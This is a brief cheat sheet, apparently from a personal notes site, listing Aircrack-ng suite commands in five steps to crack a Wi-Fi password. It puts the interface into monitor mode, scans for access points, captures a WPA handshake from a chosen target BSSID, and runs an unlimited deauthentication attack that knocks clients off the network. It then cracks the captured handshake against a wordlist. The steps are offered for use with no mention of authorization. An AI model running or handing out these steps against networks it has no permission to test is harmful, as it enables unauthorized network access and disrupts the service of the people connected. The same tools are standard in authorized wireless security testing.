githubEdit

Aircrack suite

TIP: All commands must be run with sudo

Usage:

1) Assuming that the Wi-Fi interface is wlan0) (Check with iwconfig if the interface went to monitor mode

airmon-ng start wlan0 

2) Scans for Access Points' SSIDs and BSSIDs or simply a 48-bit MAC around us

airodump-ng wlan0mon 

3) NUM represents the channel the target is tuned in. Tune in your target, then wait to capture the handshake, then save it as a .cap file

airodump-ng wlan0mon -c NUM --bssid TARGET_BSSID -w pwd 

4) Perform a deauthentication attack against the target

aireplay-ng --deauth 0 -a TARGET_BSSID wlan0mon 

5) Crack the Wi-Fi password

aircrack-ng HANDSHAKE_FILE.cap -w WORDLIST.txt 

Last updated